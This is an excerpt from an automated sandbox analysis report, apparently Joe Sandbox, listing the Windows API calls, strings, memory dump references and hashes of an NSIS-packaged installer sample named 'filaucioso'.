                                                                        • SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
                                                                        • GetCommandLineA.KERNEL32(007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
                                                                        • CharNextA.USER32(00000000,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 00403356
                                                                        • GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                        • GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
                                                                        • lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
                                                                        • GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
                                                                        • lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
                                                                        • DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
                                                                        • OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
                                                                        • ExitProcess.KERNEL32 ref: 00403588
                                                                        • lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
                                                                        • lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
                                                                        • lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
                                                                        • lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
                                                                        • SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
                                                                        • DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
                                                                        • CopyFileA.KERNEL32(007AAC00,0079E108,?), ref: 0040364A
                                                                        • CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                        • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                        • ExitProcess.KERNEL32 ref: 0040372A
                                                                          • Part of subcall function 004059B0: CharNextA.USER32(?,00403355,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 004059BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$Exit$CharCurrentDeleteDirectoryEnvironmentHandleNextPathTempTokenVariableWindows$AddressAdjustCloseCommandCopyInfoInitializeLineLookupModuleOpenPrivilegePrivilegesProcUninitializeValuelstrcmpilstrlen
                                                                        • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vx+$\Temp$`Kt$~nsu
                                                                        • API String ID: 626260513-3559245354
                                                                        • Opcode ID: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
                                                                        • Instruction ID: 8af8fcedd10493f8e80c4eada79d0bae115e97f9cb4a2bc1da61e0caac86d092
                                                                        • Opcode Fuzzy Hash: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
                                                                        • Instruction Fuzzy Hash: 0F91E270144741BAD7106F759D49E2F3EACAF8630AF05043EF581B61E2DB7C8A158B2E
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(?,?), ref: 004057DE
                                                                        • lstrcatA.KERNEL32(007A0550,\*.*,007A0550,?,?), ref: 00405826
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,007A0550,?,?), ref: 00405847
                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,007A0550,?,?), ref: 0040584D
                                                                        • FindFirstFileA.KERNEL32(007A0550,?,?,?,0040A014,?,007A0550,?,?), ref: 0040585E
                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
                                                                        • FindClose.KERNEL32(00000000), ref: 0040591C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: \*.*
                                                                        • API String ID: 2035342205-1173974218
                                                                        • Opcode ID: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
                                                                        • Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
                                                                        • Opcode Fuzzy Hash: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
                                                                        • Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A97
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404AA4
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AF3
                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
                                                                        • SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
                                                                        • DeleteObject.GDI32(00000110), ref: 00404B81
                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82
                                                                          • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404CE2
                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404EB0
                                                                        • GlobalFree.KERNEL32(?), ref: 00404EC0
                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
                                                                        • InvalidateRect.USER32(?,00000000,?), ref: 00405011
                                                                        • ShowWindow.USER32(?,00000000), ref: 0040505F
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 0040506A
                                                                        • ShowWindow.USER32(00000000), ref: 00405071
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 2564846305-813528018
                                                                        • Opcode ID: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
                                                                        • Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
                                                                        • Opcode Fuzzy Hash: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
                                                                        • Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 004052B1
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004052C0
                                                                        • GetClientRect.USER32(?,?), ref: 004052FD
                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405304
                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
                                                                        • ShowWindow.USER32(?,00000008), ref: 004053A0
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004053C1
                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004052CF
                                                                          • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405412
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000051E6,00000000), ref: 00405420
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405427
                                                                        • ShowWindow.USER32(00000000), ref: 0040544A
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405451
                                                                        • ShowWindow.USER32(00000008), ref: 00405497
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
                                                                        • CreatePopupMenu.USER32 ref: 004054DC
                                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054F1
                                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405511
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
                                                                        • OpenClipboard.USER32(00000000), ref: 00405576
                                                                        • EmptyClipboard.USER32 ref: 0040557C
                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040558F
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004055BC
                                                                        • SetClipboardData.USER32(?,00000000), ref: 004055C7
                                                                        • CloseClipboard.USER32 ref: 004055CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID:
                                                                        • API String ID: 590372296-0
                                                                        • Opcode ID: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
                                                                        • Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
                                                                        • Opcode Fuzzy Hash: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
                                                                        • Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
                                                                        • ShowWindow.USER32(?), ref: 00403C00
                                                                        • DestroyWindow.USER32 ref: 00403C14
                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
                                                                        • GetDlgItem.USER32(?,?), ref: 00403C51
                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403C6C
                                                                        • GetDlgItem.USER32(?,?), ref: 00403D1A
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403D24
                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
                                                                        • SendMessageA.USER32(0000040F,00000000,?), ref: 00403D8F
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403E35
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403E56
                                                                        • EnableWindow.USER32(?,?), ref: 00403E68
                                                                        • EnableWindow.USER32(?,?), ref: 00403E83
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E99
                                                                        • EnableMenuItem.USER32(00000000), ref: 00403EA0
                                                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403EB8
                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
                                                                        • lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
                                                                        • SetWindowTextA.USER32(?,0079F548), ref: 00403F04
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404038
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                        • String ID:
                                                                        • API String ID: 184305955-0
                                                                        • Opcode ID: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
                                                                        • Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
                                                                        • Opcode Fuzzy Hash: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
                                                                        • Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D
                                                                        APIs
                                                                          • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                          • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                        • lstrcatA.KERNEL32(007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,74DF3410,007AA400,007A9000), ref: 00403885
                                                                        • lstrlenA.KERNEL32(007A1EE0,007A9400,?,?,007A1EE0,00000000,007A9400,007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,74DF3410), ref: 004038FA
                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                        • GetFileAttributesA.KERNEL32(007A1EE0), ref: 00403918
                                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,007A9400), ref: 00403961
                                                                          • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                        • RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
                                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
                                                                        • ShowWindow.USER32(00000005), ref: 00403A21
                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
                                                                        • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
                                                                        • RegisterClassA.USER32(007A26E0), ref: 00403A63
                                                                        • DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                                        • API String ID: 1975747703-471597453
                                                                        • Opcode ID: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
                                                                        • Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
                                                                        • Opcode Fuzzy Hash: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
                                                                        • Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D
                                                                        APIs
                                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404271
                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404285
                                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004042A3
                                                                        • GetSysColor.USER32(?), ref: 004042B4
                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
                                                                        • lstrlenA.KERNEL32(?), ref: 004042D5
                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040435B
                                                                        • SendMessageA.USER32(00000000), ref: 0040435E
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404389
                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
                                                                        • SetCursor.USER32(00000000), ref: 004043E1
                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
                                                                        • SetCursor.USER32(00000000), ref: 004043FA
                                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404426
                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: N
                                                                        • API String ID: 3103080414-1130791706
                                                                        • Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                        • Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
                                                                        • Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                        • Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99
                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                        • GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
                                                                        • lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
                                                                        • GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
                                                                        • lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
                                                                        • DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
                                                                          • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                        • OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
                                                                        • ExitProcess.KERNEL32 ref: 00403588
                                                                        • lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
                                                                        • lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
                                                                        • lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
                                                                        • lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
                                                                        • SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
                                                                        • DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
                                                                        • CopyFileA.KERNEL32(007AAC00,0079E108,?), ref: 0040364A
                                                                        • CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                        • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                        • ExitProcess.KERNEL32 ref: 0040372A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$Process$ExitFile$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableWindows$AdjustCloseCopyHandleLookupOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrcpyn
                                                                        • String ID: $"$Error launching installer$Low$TEMP$TMP$Vx+$\Temp$`Kt
                                                                        • API String ID: 109303428-4066086907
                                                                        • Opcode ID: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
                                                                        • Instruction ID: ee86094215728b75d9dae95d605afab31ae71dc2a4c79600e913a2246e4d607c
                                                                        • Opcode Fuzzy Hash: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
                                                                        • Instruction Fuzzy Hash: 9451033050879069E7256F354D9962F7FE9ABC2306F08447FE4927A2E2CA7C4A04C72F
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,007A2740,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
